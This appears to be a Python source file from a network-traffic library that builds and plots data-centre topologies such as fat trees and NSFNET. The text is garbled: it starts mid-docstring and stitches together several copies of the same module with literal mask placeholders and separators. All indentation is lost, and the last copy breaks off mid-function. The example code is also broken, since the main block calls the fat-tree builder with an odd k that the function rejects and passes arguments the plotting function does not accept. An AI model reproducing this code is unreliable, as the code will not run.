ep_label (str,int,float): Endpoint label (e.g. 'server'). All endpoints will have
ep_label appended to the start of their label (e.g. 'server_0', 'server_1', ...).
network_node_size (int,float): Size of plotted nodes.
font_size (int,float): Size of of font of plotted labels etc.
linewidths (int,float): Width of edges in network.
fig_scale (int,float): Scaling factor to apply to plotted network.
path_to_save (str): Path to directory (with file name included) in which
to save generated plot. E.g. path_to_save='data/my_plot'
show_fig (bool): Whether or not to plot and show fig. If True, will
return and display fig.
Returns:
matplotlib.figure.Figure: node distribution plotted as a 2d matrix.
"""
net_node_positions = init_network_node_positions(copy.deepcopy(network))
fig = plt.figure(figsize=[15 * fig_scale, 15 * fig_scale])
pos = {}
network_nodes = []
network_nodes_dict = get_node_type_dict(network, network.graph[
'node_labels'])
for nodes in list(network_nodes_dict.values()):
for network_node in nodes:
pos[network_node] = net_node_positions[network_node]
node_colours = iter(['#25c44d', '#36a0c7', '#e8b017', '#6115a3', '#160e63']
)
for node_type in network.graph['node_labels']:
nx.draw_networkx_nodes(network, pos, nodelist=network_nodes_dict[
node_type], node_size=network_node_size, node_color=next(
node_colours), linewidths=linewidths, label=node_type)
if draw_node_labels:
nx.draw_networkx_labels(network, pos, font_size=font_size,
font_color='k', font_family='sans-serif', font_weight='normal',
alpha=1.0)
fibre_links = list(network.edges)
nx.draw_networkx_edges(network, pos, edgelist=fibre_links, edge_color=
'k', width=3, label='Fibre link')
if path_to_save is not None:
tools.pickle_data(path_to_save, fig)
if show_fig:
plt.show()
return fig
<mask token>
| <mask token>
from trafpy.generator.src import tools
import copy
import networkx as nx
import matplotlib.pyplot as plt
import json
def gen_arbitrary_network(num_eps, ep_label=None, ep_capacity=12500,
num_channels=1, racks_dict=None, topology_type=None):
"""Generates an arbitrary network with num_eps nodes labelled as ep_label.
Note that no edges are formed in this network; it is purely for ep name
indexing purposes when using Demand class. This is useful where want to
use the demand class but not necessarily with a carefully crafted networkx
graph that accurately mimics the network you will use for the demands
Args:
num_eps (int): Number of endpoints in network.
ep_label (str,int,float): Endpoint label (e.g. 'server'). All endpoints will have
ep_label appended to the start of their label (e.g. 'server_0', 'server_1', ...).
ep_capacity (int, float): Byte capacity per end point channel.
num_channels (int, float): Number of channels on each link in network.
racks_dict (dict): Mapping of which end points are in which racks. Keys are
rack ids, values are list of end points. If None, assume there is not
clustering/rack system in the network where have different end points
in different clusters/racks.
Returns:
networkx graph: network object
"""
network = nx.Graph()
network.add_nodes_from([node for node in range(num_eps)])
if ep_label is None:
servers = [str(i) for i in range(num_eps)]
else:
servers = [(ep_label + '_' + str(i)) for i in range(num_eps)]
relabel_mapping = {node: label for node, label in zip(range(num_eps),
servers)}
network = nx.relabel_nodes(network, relabel_mapping)
eps = []
for node in list(network.nodes):
try:
if ep_label in node:
eps.append(node)
except TypeError:
eps.append(node)
network.graph['endpoints'] = eps
max_nw_capacity = num_eps * ep_capacity * num_channels / 2
if topology_type is None:
topology_type = 'arbitrary_endpoints_{}_chancap_{}_channels_{}'.format(
num_eps, ep_capacity, num_channels)
init_global_network_attrs(network, max_nw_capacity, num_channels,
ep_link_capacity=ep_capacity * num_channels, endpoint_label=
ep_label, node_labels=[ep_label], racks_dict=racks_dict,
topology_type=topology_type)
return network
def gen_nsfnet_network(ep_label='server', rack_label='rack', N=0,
num_channels=2, server_to_rack_channel_capacity=1,
rack_to_rack_channel_capacity=10, show_fig=False):
"""Generates the standard 14-node NSFNET topology (a U.S. core network).
Args:
ep_label (str,int,float): Endpoint label (e.g. 'server'). All endpoints will have
ep_label appended to the start of their label (e.g. 'server_0', 'server_1', ...).
N (int): Number of servers per rack. If 0, assume all nodes in nsfnet
are endpoints
num_channels (int,float): Number of channels on each link in network.
server_to_rack_channel_capacity (int,float): Byte capacity per channel
between servers and ToR switch.
rack_to_rack_channel_capacity (int,float): Byte capacity per channel between racks.
show_fig (bool): Whether or not to plot and show fig. If True, will
display fig.
Returns:
networkx graph: network object
"""
channel_names = gen_channel_names(num_channels)
network = nx.Graph()
node_pair_list = [[0, 1], [0, 3], [0, 2], [1, 2], [1, 7], [3, 8], [3, 4
], [3, 6], [4, 5], [4, 5], [5, 2], [5, 13], [5, 12], [6, 7], [7, 10
], [8, 11], [8, 9], [9, 10], [9, 12], [10, 11], [10, 13], [11, 12]]
if N == 0:
label = ep_label
else:
label = rack_label
for idx in range(len(node_pair_list)):
node_pair_list[idx][0] = label + '_' + str(node_pair_list[idx][0])
node_pair_list[idx][1] = label + '_' + str(node_pair_list[idx][1])
for edge in node_pair_list:
network.add_edge(*tuple(edge))
if N == 0:
racks_dict = None
else:
i = 0
racks_dict = {rack: [] for rack in range(14)}
for rack in range(14):
for server in range(N):
racks_dict[rack].append(ep_label + '_' + str(i))
network.add_edge(ep_label + '_' + str(i), rack_label + '_' +
str(rack))
i += 1
channel_names = gen_channel_names(num_channels)
edges = [edge for edge in network.edges]
add_edges_capacity_attrs(network, edges, channel_names,
rack_to_rack_channel_capacity)
network.graph['endpoints'] = get_endpoints(network, ep_label)
max_nw_capacity = len(network.edges
) * num_channels * rack_to_rack_channel_capacity / 2
init_global_network_attrs(network, max_nw_capacity, num_channels,
ep_link_capacity=server_to_rack_channel_capacity * num_channels,
endpoint_label=ep_label, node_labels=[ep_label, rack_label],
topology_type='14_node_nsfnet', racks_dict=racks_dict)
if show_fig:
plot_network(network, show_fig=True)
return network
def gen_simple_network(ep_label='server', num_channels=2,
server_to_rack_channel_capacity=500, show_fig=False):
"""Generates very simple 5-node topology.
Args:
ep_label (str,int,float): Endpoint label (e.g. 'server'). All endpoints will have
ep_label appended to the start of their label (e.g. 'server_0', 'server_1', ...).
num_channels (int,float): Number of channels on each link in network.
channel_capacity (int,float): Byte capacity per channel.
show_fig (bool): Whether or not to plot and show fig. If True, will
display fig.
Returns:
networkx graph: network object
"""
network = nx.Graph()
network.add_nodes_from([node for node in range(5)])
network.add_edges_from([(0, 1), (0, 2), (1, 2), (2, 4), (4, 3), (3, 1)],
weight=1)
servers = [(ep_label + '_' + str(i)) for i in range(5)]
relabel_mapping = {node: label for node, label in zip(range(5), servers)}
network = nx.relabel_nodes(network, relabel_mapping)
channel_names = gen_channel_names(num_channels)
edges = [edge for edge in network.edges]
add_edges_capacity_attrs(network, edges, channel_names,
server_to_rack_channel_capacity)
network.graph['endpoints'] = get_endpoints(network, ep_label)
max_nw_capacity = len(network.edges
) * num_channels * server_to_rack_channel_capacity / 2
init_global_network_attrs(network, max_nw_capacity, num_channels,
ep_link_capacity=server_to_rack_channel_capacity * num_channels,
endpoint_label=ep_label, node_labels=[ep_label], topology_type=
'5_node_simple_network')
if show_fig:
plot_network(network, show_fig=True)
return network
def get_endpoints(network, ep_label):
"""Gets list of endpoints of network.
Args:
network (networkx graph): Networkx object.
ep_label (str,int,float): Endpoint label (e.g. 'server'). All endpoints will have
ep_label appended to the start of their label (e.g. 'server_0', 'server_1', ...).
Returns:
eps (list): List of endpoints.
"""
eps = []
for node in list(network.nodes):
if ep_label in node:
eps.append(node)
return eps
def gen_fat_tree(k=4, L=2, n=4, ep_label='server', rack_label='rack',
edge_label='edge', aggregate_label='agg', core_label='core',
num_channels=2, server_to_rack_channel_capacity=500,
rack_to_edge_channel_capacity=1000, edge_to_agg_channel_capacity=1000,
agg_to_core_channel_capacity=2000, rack_to_core_channel_capacity=2000,
show_fig=False):
"""Generates a perfect fat tree (i.e. all layers have switches with same radix/number of ports).
Top layer is always core (spine) switch layer, bottom layer is always
ToR (leaf) layer.
L must be either 2 (core, ToR) or 4 (core, agg, edge, ToR)
N.B. L=2 is commonly referred to as '2-layer Clos' or 'Clos' or 'spine-leaf' topology
Resource for building (scroll down to summary table with equations):
https://packetpushers.net/demystifying-dcn-topologies-clos-fat-trees-part2/
Another good resource for data centre topologies etc. in general:
https://www.oreilly.com/library/view/bgp-in-the/9781491983416/ch01.html#:~:text=The%20most%20common%20routing%20protocol,single%20data%20center%2C%20as%20well.
Parameters of network:
- number of core (spine) switches = (k/2)^(L/2) (top layer)
- number of edge switches (if L=4) = (k^2)/2
- number of agg switches (if L=4) = (k^2)/2
- number of pods (if L=4) (pod is a group of agg and/or edge switches) = 2*(k/2)^(L-2)
- number of ToR (leaf) switches (racks) = 2*(k/2)^(L-1) (bottom layer)
- number of server-facing ToR 'host' ports = 2*(k/2)^2 (can have multiple servers connected to same host port, & can oversubscribe)
- number of servers = number ToR switches * n
Args:
k (int): Number of ports (links) on each switch (both up and down).
L (int): Number of layers in the fat tree.
n (int): Number of server per rack.
ep_label (str,int,float): Endpoint label (e.g. 'server'). All endpoints will have
ep_label appended to the start of their label (e.g. 'server_0', 'server_1', ...).
edge_label (str,int): Label to assign to edge switch nodes
aggregate_label (str,int): Label to assign to edge switch nodes
core_label (str,int): Label to assign to core switch nodes
num_channels (int, float): Number of channels on each link in network
server_to_edge_channel_capacity (int,float): Byte capacity per channel
edge_to_agg_channel_capacity (int,float): (if L==4) Byte capacity per channel
agg_to_core_channel_capacity (int,float): (if L==4) Byte capacity per channel
rack_to_core_channel_capacity (int,float): (if L==2) Byte capacity per channel
Returns:
networkx graph: network object
"""
if L != 2 and L != 4:
raise Exception(
'L must be 2 (ToR layer, core layer) or 4 (ToR layer, edge layer, agg layer, core layer), but is {}.'
.format(L))
if k % 2 != 0:
raise Exception(
'k must be even since, in perfect fat tree, have equal number of up and down ports on each switch, but is {}.'
.format(k))
channel_names = gen_channel_names(num_channels)
if L == 2:
node_labels = [ep_label, rack_label, core_label]
else:
node_labels = [ep_label, rack_label, edge_label, aggregate_label,
core_label]
num_cores = int((k / 2) ** (L / 2))
num_aggs = int(k ** 2 / 2)
num_edges = int(k ** 2 / 2)
num_pods = int(2 * (k / 2) ** (L - 2))
num_racks = int(2 * (k / 2) ** (L - 1))
num_servers = int(num_racks * n)
cores = [(core_label + '_' + str(i)) for i in range(num_cores)]
aggs = [(aggregate_label + '_' + str(i)) for i in range(num_aggs)]
edges = [(edge_label + '_' + str(i)) for i in range(num_edges)]
racks = [(rack_label + '_' + str(i)) for i in range(num_racks)]
servers = [(ep_label + '_' + str(i)) for i in range(num_servers)]
core_layer = nx.Graph()
rack_layer = nx.Graph()
core_layer.add_nodes_from(cores)
rack_layer.add_nodes_from(racks)
fat_tree_network = nx.compose(core_layer, rack_layer)
if L == 2:
rack_iterator = iter(racks)
for rack in racks:
core_iterator = iter(cores)
for up_port in range(int(k / 2)):
core = next(core_iterator)
fat_tree_network.add_edge(rack, core)
add_edge_capacity_attrs(fat_tree_network, (rack, core),
channel_names, rack_to_core_channel_capacity)
else:
num_pods = int(k)
pods = [[] for i in range(num_pods)]
prev_iter = 0
for pod_iter in range(len(pods)):
curr_iter = int(prev_iter + k / 2)
pods[pod_iter].append(edges[prev_iter:curr_iter])
pods[pod_iter].append(aggs[prev_iter:curr_iter])
prev_iter = curr_iter
pod_labels = [('pod_' + str(i)) for i in range(num_pods)]
pods_dict = {tuple([pod]): nx.Graph() for pod in pod_labels}
for pod_iter in range(num_pods):
key = 'pod_' + str(pod_iter),
pod_edges = pods[pod_iter][0]
pod_aggs = pods[pod_iter][1]
pods_dict[key].add_nodes_from(pod_edges)
pods_dict[key].add_nodes_from(pod_aggs)
for pod_edge in pod_edges:
for pod_agg in pod_aggs:
pods_dict[key].add_edge(pod_agg, pod_edge)
add_edge_capacity_attrs(pods_dict[key], (pod_agg,
pod_edge), channel_names, edge_to_agg_channel_capacity)
pod_networks = list(pods_dict.values())
for pod_iter in range(num_pods):
fat_tree_network = nx.compose(fat_tree_network, pod_networks[
pod_iter])
for pod_iter in range(num_pods):
pod_aggs = pods[pod_iter][1]
core_iterator = iter(cores)
for pod_agg in pod_aggs:
while fat_tree_network.degree[pod_agg] < k:
core = next(core_iterator)
fat_tree_network.add_edge(core, pod_agg)
add_edge_capacity_attrs(fat_tree_network, (core,
pod_agg), channel_names, agg_to_core_channel_capacity)
rack_iterator = iter(racks)
for pod_iter in range(num_pods):
pod_edges = pods[pod_iter][0]
for pod_edge in pod_edges:
while fat_tree_network.degree[pod_edge] < k:
rack = next(rack_iterator)
fat_tree_network.add_edge(pod_edge, rack)
add_edge_capacity_attrs(fat_tree_network, (pod_edge,
rack), channel_names, rack_to_edge_channel_capacity)
racks_dict = {rack: [] for rack in racks}
server_iterator = iter(servers)
for rack in racks:
for _ in range(n):
server = next(server_iterator)
fat_tree_network.add_edge(rack, server)
add_edge_capacity_attrs(fat_tree_network, (rack, server),
channel_names, server_to_rack_channel_capacity)
racks_dict[rack].append(server)
max_nw_capacity = (num_servers * num_channels *
server_to_rack_channel_capacity / 2)
fat_tree_network.graph['endpoints'] = servers
init_global_network_attrs(fat_tree_network, max_nw_capacity,
num_channels, ep_link_capacity=server_to_rack_channel_capacity *
num_channels, endpoint_label=ep_label, node_labels=node_labels,
topology_type='fat_tree', racks_dict=racks_dict)
if show_fig:
plot_network(fat_tree_network, show_fig=True)
return fat_tree_network
def init_global_network_attrs(network, max_nw_capacity, num_channels,
ep_link_capacity, endpoint_label='server', topology_type='unknown',
node_labels=['server'], racks_dict=None):
"""Initialises the standard global network attributes of a given network.
Args:
network (obj): NetworkX object.
max_nw_capacity (int/float): Maximum rate at which info can be reliably
transmitted over the network (sum of all link capacities).
num_channels (int): Number of channels on each link in network.
topology_type (str): Label of network topology (e.g. 'fat_tree').
node_labels (list): Label classes assigned to network nodes
(e.g. ['server', 'rack', 'edge']).
racks_dict (dict): Which servers/endpoints are in which rack. If None,
assume do not have rack system where have multiple servers in one
rack.
"""
network.graph['endpoint_label'] = endpoint_label
network.graph['num_channels_per_link'] = num_channels
network.graph['ep_link_capacity'] = ep_link_capacity
network.graph['ep_link_port_capacity'] = ep_link_capacity / 2
network.graph['max_nw_capacity'] = max_nw_capacity
network.graph['curr_nw_capacity_used'] = 0
network.graph['num_active_connections'] = 0
network.graph['total_connections_blocked'] = 0
network.graph['node_labels'] = node_labels
network.graph['topology_type'] = topology_type
network.graph['channel_names'] = gen_channel_names(num_channels)
if racks_dict is not None:
_racks_dict = {}
for key, val in racks_dict.items():
_racks_dict[str(key)] = []
for v in val:
_racks_dict[str(key)].append(str(v))
network.graph['rack_to_ep_dict'] = _racks_dict
else:
network.graph['rack_to_ep_dict'] = None
if racks_dict is not None:
ep_to_rack_dict = {}
for key, val in _racks_dict.items():
for v in val:
if v not in ep_to_rack_dict.keys():
ep_to_rack_dict[v] = key
network.graph['ep_to_rack_dict'] = ep_to_rack_dict
else:
network.graph['ep_to_rack_dict'] = None
def gen_channel_names(num_channels):
"""Generates channel names for channels on each link in network."""
channels = [(channel + 1) for channel in range(num_channels)]
channel_names = [('channel_' + str(channel)) for channel in channels]
return channel_names
def add_edge_capacity_attrs(network, edge, channel_names, channel_capacity,
bidirectional_links=True):
"""Adds channels and corresponding max channel bytes to single edge in network.
Args:
network (networkx graph): Network containing edges to whiich attrs will
be added.
edge (tuple): Node-node edge pair.
channel_names (list): List of channel names to add to edge.
channel_capacity (int,float): Capacity to allocate to each channel.
bidirectional_links (bool): If True, each link has capacity split equally
between src and dst port. I.e. all links have a src and dst port
which are treated separately to incoming and outgoing traffic to and
from given node (switch or server).
"""
if bidirectional_links:
attrs = {edge: {'{}_to_{}_port'.format(edge[0], edge[1]): {
'channels': {channel: (channel_capacity / 2) for channel in
channel_names}, 'max_channel_capacity': channel_capacity / 2},
'{}_to_{}_port'.format(edge[1], edge[0]): {'channels': {channel:
(channel_capacity / 2) for channel in channel_names},
'max_channel_capacity': channel_capacity / 2}}}
else:
attrs = {edge: {'channels': {channel: channel_capacity for channel in
channel_names}, 'max_channel_capacity': channel_capacity}}
nx.set_edge_attributes(network, attrs)
def add_edges_capacity_attrs(network, edges, channel_names,
channel_capacity, bidirectional_links=True):
"""Adds channels & max channel capacitys to single edge in network.
To access e.g. the edge going from node 0 to node 1 (edge (0, 1)), you
would index the network with network[0][1]
To access e.g. the channel_1 attribute of this particular (0, 1) edge, you
would do network[0][1]['channels']['channel_1']
OR
if bidirectional_links, you do network[0][1]['0_to_1_port']['channels']['channel_1']
or network[0][1]['1_to_0_port']['channels']['channel_1] depending on which direction
of the link you want to access.
Args:
network (networkx graph): Network containing edges to which attrs will
be added.
edges (list): List of node pairs in tuples.
channel_names (list of str): List of channel names to add to edge.
channel_capacity (int, float): Capacity to allocate to each channel.
bidirectional_links (bool): If True, each link has capacity split equally
between src and dst port. I.e. all links have a src and dst port
which are treated separately to incoming and outgoing traffic to and
from given node (switch or server).
"""
if bidirectional_links:
attrs = {edge: {'{}_to_{}_port'.format(edge[0], edge[1]): {
'channels': {channel: (channel_capacity / 2) for channel in
channel_names}, 'max_channel_capacity': channel_capacity / 2},
'{}_to_{}_port'.format(edge[1], edge[0]): {'channels': {channel:
(channel_capacity / 2) for channel in channel_names},
'max_channel_capacity': channel_capacity / 2}} for edge in edges}
else:
attrs = {edge: {'channels': {channel: channel_capacity for channel in
channel_names}, 'max_channel_capacity': channel_capacity} for
edge in edges}
nx.set_edge_attributes(network, attrs)
def get_node_type_dict(network, node_types=[]):
"""Gets dict where keys are node types, values are list of nodes for each node type in graph."""
network_nodes = []
for network_node in network.nodes:
network_nodes.append(network_node)
network_nodes_dict = {node_type: [] for node_type in node_types}
for n in network_nodes:
for node_type in node_types:
if node_type in n:
network_nodes_dict[node_type].append(n)
else:
pass
return network_nodes_dict
def get_fat_tree_positions(net, width_scale=500, height_scale=10):
"""Gets networkx positions of nodes in fat tree network for plotting."""
pos = {}
node_type_dict = get_node_type_dict(net, net.graph['node_labels'])
node_types = list(node_type_dict.keys())
heights = {}
widths = {}
h = iter([1, 2, 3, 4, 5])
for node_type in node_types:
heights[node_type] = next(h)
widths[node_type] = 1 / (len(node_type_dict[node_type]) + 1)
idx = 0
for node in node_type_dict[node_type]:
pos[node] = (idx + 1) * widths[node_type] * width_scale, heights[
node_type] * height_scale
idx += 1
return pos
def init_network_node_positions(net):
"""Initialises network node positions for plotting."""
if net.graph['topology_type'] == 'fat_tree':
pos = get_fat_tree_positions(net)
else:
pos = nx.nx_agraph.graphviz_layout(net, prog='neato')
return pos
def plot_network(network, draw_node_labels=True, ep_label='server',
network_node_size=2000, font_size=30, linewidths=1, fig_scale=2,
path_to_save=None, show_fig=False):
"""Plots networkx graph.
Recognises special fat tree network and applies appropriate node positioning,
labelling, colouring etc.
Args:
network (networkx graph): Network object to be plotted.
draw_node_labels (bool): Whether or not to draw node labels on plot.
ep_label (str,int,float): Endpoint label (e.g. 'server'). All endpoints will have
ep_label appended to the start of their label (e.g. 'server_0', 'server_1', ...).
network_node_size (int,float): Size of plotted nodes.
font_size (int,float): Size of of font of plotted labels etc.
linewidths (int,float): Width of edges in network.
fig_scale (int,float): Scaling factor to apply to plotted network.
path_to_save (str): Path to directory (with file name included) in which
to save generated plot. E.g. path_to_save='data/my_plot'
show_fig (bool): Whether or not to plot and show fig. If True, will
return and display fig.
Returns:
matplotlib.figure.Figure: node distribution plotted as a 2d matrix.
"""
net_node_positions = init_network_node_positions(copy.deepcopy(network))
fig = plt.figure(figsize=[15 * fig_scale, 15 * fig_scale])
pos = {}
network_nodes = []
network_nodes_dict = get_node_type_dict(network, network.graph[
'node_labels'])
for nodes in list(network_nodes_dict.values()):
for network_node in nodes:
pos[network_node] = net_node_positions[network_node]
node_colours = iter(['#25c44d', '#36a0c7', '#e8b017', '#6115a3', '#160e63']
)
for node_type in network.graph['node_labels']:
nx.draw_networkx_nodes(network, pos, nodelist=network_nodes_dict[
node_type], node_size=network_node_size, node_color=next(
node_colours), linewidths=linewidths, label=node_type)
if draw_node_labels:
nx.draw_networkx_labels(network, pos, font_size=font_size,
font_color='k', font_family='sans-serif', font_weight='normal',
alpha=1.0)
fibre_links = list(network.edges)
nx.draw_networkx_edges(network, pos, edgelist=fibre_links, edge_color=
'k', width=3, label='Fibre link')
if path_to_save is not None:
tools.pickle_data(path_to_save, fig)
if show_fig:
plt.show()
return fig
if __name__ == '__main__':
network = gen_fat_tree(k=3)
plot_network(network, 'figures/graph/', name='network_graph.png',
with_labels=True)
| '''Module for generating and plotting networks.'''
from trafpy.generator.src import tools
import copy
import networkx as nx
import matplotlib.pyplot as plt
import json
def gen_arbitrary_network(num_eps,
ep_label=None,
ep_capacity=12500,
num_channels=1,
racks_dict=None,
topology_type=None):
'''Generates an arbitrary network with num_eps nodes labelled as ep_label.
Note that no edges are formed in this network; it is purely for ep name
indexing purposes when using Demand class. This is useful where want to
use the demand class but not necessarily with a carefully crafted networkx
graph that accurately mimics the network you will use for the demands
Args:
num_eps (int): Number of endpoints in network.
ep_label (str,int,float): Endpoint label (e.g. 'server'). All endpoints will have
ep_label appended to the start of their label (e.g. 'server_0', 'server_1', ...).
ep_capacity (int, float): Byte capacity per end point channel.
num_channels (int, float): Number of channels on each link in network.
racks_dict (dict): Mapping of which end points are in which racks. Keys are
rack ids, values are list of end points. If None, assume there is not
clustering/rack system in the network where have different end points
in different clusters/racks.
Returns:
networkx graph: network object
'''
network = nx.Graph()
network.add_nodes_from([node for node in range(num_eps)])
if ep_label is None:
# must be str or not json serialisable
servers = [str(i) for i in range(num_eps)]
else:
servers = [ep_label+'_'+str(i) for i in range(num_eps)]
relabel_mapping = {node: label for node, label in zip(range(num_eps),servers)}
network = nx.relabel_nodes(network, relabel_mapping)
eps = []
for node in list(network.nodes):
try:
if ep_label in node:
eps.append(node)
except TypeError:
# ep_label is None
eps.append(node)
network.graph['endpoints'] = eps
# /= 2 to get max theoretical capacity (number of units which network can transfer per unit time)
max_nw_capacity = (num_eps * ep_capacity * num_channels) / 2
if topology_type is None:
topology_type = 'arbitrary_endpoints_{}_chancap_{}_channels_{}'.format(num_eps, ep_capacity, num_channels)
init_global_network_attrs(network,
max_nw_capacity,
num_channels,
ep_link_capacity=ep_capacity*num_channels,
endpoint_label=ep_label,
node_labels=[ep_label],
racks_dict=racks_dict,
topology_type=topology_type)
return network
def gen_nsfnet_network(ep_label='server',
rack_label='rack',
N=0,
num_channels=2,
server_to_rack_channel_capacity=1,
rack_to_rack_channel_capacity=10,
show_fig=False):
'''Generates the standard 14-node NSFNET topology (a U.S. core network).
Args:
ep_label (str,int,float): Endpoint label (e.g. 'server'). All endpoints will have
ep_label appended to the start of their label (e.g. 'server_0', 'server_1', ...).
N (int): Number of servers per rack. If 0, assume all nodes in nsfnet
are endpoints
num_channels (int,float): Number of channels on each link in network.
server_to_rack_channel_capacity (int,float): Byte capacity per channel
between servers and ToR switch.
rack_to_rack_channel_capacity (int,float): Byte capacity per channel between racks.
show_fig (bool): Whether or not to plot and show fig. If True, will
display fig.
Returns:
networkx graph: network object
'''
channel_names = gen_channel_names(num_channels)
network = nx.Graph()
node_pair_list = [[0,1],
[0,3],
[0,2],
[1,2],
[1,7],
[3,8],
[3,4],
[3,6],
[4,5],
[4,5],
[5,2],
[5,13],
[5,12],
[6,7],
[7,10],
[8,11],
[8,9],
[9,10],
[9,12],
[10,11],
[10,13],
[11,12]]
if N == 0:
# above nodes are all end points
label = ep_label
else:
# above nodes are ToR switch nodes
label = rack_label
for idx in range(len(node_pair_list)):
node_pair_list[idx][0] = label + '_' + str(node_pair_list[idx][0])
node_pair_list[idx][1] = label + '_' + str(node_pair_list[idx][1])
# add 14 nodes
for edge in node_pair_list:
network.add_edge(*tuple(edge))
if N == 0:
# assume all nodes are servers
racks_dict = None
else:
# each of 14 nodes in NSFNET is a ToR switch
i = 0
racks_dict = {rack: [] for rack in range(14)}
for rack in range(14):
for server in range(N):
racks_dict[rack].append(ep_label+'_'+str(i))
network.add_edge(ep_label+'_'+str(i), rack_label+'_'+str(rack))
i += 1
channel_names = gen_channel_names(num_channels)
edges = [edge for edge in network.edges]
add_edges_capacity_attrs(network, edges, channel_names, rack_to_rack_channel_capacity)
# set gloabl network attrs
network.graph['endpoints'] = get_endpoints(network, ep_label)
# /= 2 to get max theoretical capacity (number of units which network can transfer per unit time)
max_nw_capacity = (len(network.edges) * num_channels * rack_to_rack_channel_capacity) / 2
init_global_network_attrs(network,
max_nw_capacity,
num_channels,
ep_link_capacity=server_to_rack_channel_capacity*num_channels,
endpoint_label=ep_label,
node_labels=[ep_label, rack_label],
topology_type='14_node_nsfnet',
racks_dict=racks_dict)
if show_fig:
plot_network(network, show_fig=True)
return network
def gen_simple_network(ep_label='server',
num_channels=2,
server_to_rack_channel_capacity=500,
show_fig=False):
'''Generates very simple 5-node topology.
Args:
ep_label (str,int,float): Endpoint label (e.g. 'server'). All endpoints will have
ep_label appended to the start of their label (e.g. 'server_0', 'server_1', ...).
num_channels (int,float): Number of channels on each link in network.
channel_capacity (int,float): Byte capacity per channel.
show_fig (bool): Whether or not to plot and show fig. If True, will
display fig.
Returns:
networkx graph: network object
'''
network = nx.Graph()
network.add_nodes_from([node for node in range(5)])
network.add_edges_from([(0,1),
(0,2),
(1,2),
(2,4),
(4,3),
(3,1)],weight=1)
servers = [ep_label+'_'+str(i) for i in range(5)]
relabel_mapping = {node: label for node, label in zip(range(5),servers)}
network = nx.relabel_nodes(network, relabel_mapping)
channel_names = gen_channel_names(num_channels)
edges = [edge for edge in network.edges]
add_edges_capacity_attrs(network, edges, channel_names, server_to_rack_channel_capacity)
# set gloabl network attrs
network.graph['endpoints'] = get_endpoints(network, ep_label)
# /= 2 to get max theoretical capacity (number of units which network can transfer per unit time)
max_nw_capacity = (len(network.edges) * num_channels * server_to_rack_channel_capacity) / 2
init_global_network_attrs(network,
max_nw_capacity,
num_channels,
ep_link_capacity=server_to_rack_channel_capacity*num_channels,
endpoint_label=ep_label,
node_labels=[ep_label],
topology_type='5_node_simple_network')
if show_fig:
plot_network(network, show_fig=True)
return network
def get_endpoints(network, ep_label):
'''Gets list of endpoints of network.
Args:
network (networkx graph): Networkx object.
ep_label (str,int,float): Endpoint label (e.g. 'server'). All endpoints will have
ep_label appended to the start of their label (e.g. 'server_0', 'server_1', ...).
Returns:
eps (list): List of endpoints.
'''
eps = []
for node in list(network.nodes):
if ep_label in node:
eps.append(node)
return eps
def gen_fat_tree(k=4,
L=2,
n=4,
ep_label='server',
rack_label='rack',
edge_label='edge',
aggregate_label='agg',
core_label='core',
num_channels = 2,
server_to_rack_channel_capacity=500,
rack_to_edge_channel_capacity=1000,
edge_to_agg_channel_capacity=1000,
agg_to_core_channel_capacity=2000,
rack_to_core_channel_capacity=2000,
show_fig=False):
'''Generates a perfect fat tree (i.e. all layers have switches with same radix/number of ports).
Top layer is always core (spine) switch layer, bottom layer is always
ToR (leaf) layer.
L must be either 2 (core, ToR) or 4 (core, agg, edge, ToR)
N.B. L=2 is commonly referred to as '2-layer Clos' or 'Clos' or 'spine-leaf' topology
Resource for building (scroll down to summary table with equations):
https://packetpushers.net/demystifying-dcn-topologies-clos-fat-trees-part2/
Another good resource for data centre topologies etc. in general:
https://www.oreilly.com/library/view/bgp-in-the/9781491983416/ch01.html#:~:text=The%20most%20common%20routing%20protocol,single%20data%20center%2C%20as%20well.
Parameters of network:
- number of core (spine) switches = (k/2)^(L/2) (top layer)
- number of edge switches (if L=4) = (k^2)/2
- number of agg switches (if L=4) = (k^2)/2
- number of pods (if L=4) (pod is a group of agg and/or edge switches) = 2*(k/2)^(L-2)
- number of ToR (leaf) switches (racks) = 2*(k/2)^(L-1) (bottom layer)
- number of server-facing ToR 'host' ports = 2*(k/2)^2 (can have multiple servers connected to same host port, & can oversubscribe)
- number of servers = number ToR switches * n
Args:
k (int): Number of ports (links) on each switch (both up and down).
L (int): Number of layers in the fat tree.
n (int): Number of server per rack.
ep_label (str,int,float): Endpoint label (e.g. 'server'). All endpoints will have
ep_label appended to the start of their label (e.g. 'server_0', 'server_1', ...).
edge_label (str,int): Label to assign to edge switch nodes
aggregate_label (str,int): Label to assign to edge switch nodes
core_label (str,int): Label to assign to core switch nodes
num_channels (int, float): Number of channels on each link in network
server_to_edge_channel_capacity (int,float): Byte capacity per channel
edge_to_agg_channel_capacity (int,float): (if L==4) Byte capacity per channel
agg_to_core_channel_capacity (int,float): (if L==4) Byte capacity per channel
rack_to_core_channel_capacity (int,float): (if L==2) Byte capacity per channel
Returns:
networkx graph: network object
'''
if L != 2 and L != 4:
raise Exception('L must be 2 (ToR layer, core layer) or 4 (ToR layer, edge layer, agg layer, core layer), but is {}.'.format(L))
if k % 2 != 0:
raise Exception('k must be even since, in perfect fat tree, have equal number of up and down ports on each switch, but is {}.'.format(k))
channel_names = gen_channel_names(num_channels)
# initialise network nodes
if L == 2:
node_labels = [ep_label, rack_label, core_label]
else:
node_labels = [ep_label, rack_label, edge_label, aggregate_label, core_label]
#num_cores = int((k/2)**(L-1))
#num_cores = int((k/2)**2)
num_cores = int((k/2)**(L/2))
num_aggs = int((k**2)/2)
num_edges = int((k**2)/2)
num_pods = int(2*(k/2)**(L-2))
num_racks = int(2*(k/2)**(L-1))
num_servers = int(num_racks * n)
cores = [core_label+'_'+str(i) for i in range(num_cores)]
aggs = [aggregate_label+'_'+str(i) for i in range(num_aggs)]
edges = [edge_label+'_'+str(i) for i in range(num_edges)]
racks = [rack_label+'_'+str(i) for i in range(num_racks)]
servers = [ep_label+'_'+str(i) for i in range(num_servers)]
# create core and rack layer networks
core_layer = nx.Graph()
rack_layer = nx.Graph()
core_layer.add_nodes_from(cores)
rack_layer.add_nodes_from(racks)
# combine cores and racks into single network
fat_tree_network = nx.compose(core_layer, rack_layer)
if L == 2:
# 2 layers: Core, ToR
# link racks to cores, add link attributes
rack_iterator = iter(racks)
for rack in racks:
core_iterator = iter(cores)
# have k/2 up-ports on each switch
for up_port in range(int(k/2)):
core = next(core_iterator)
fat_tree_network.add_edge(rack, core)
add_edge_capacity_attrs(fat_tree_network,
(rack, core),
channel_names,
rack_to_core_channel_capacity)
else:
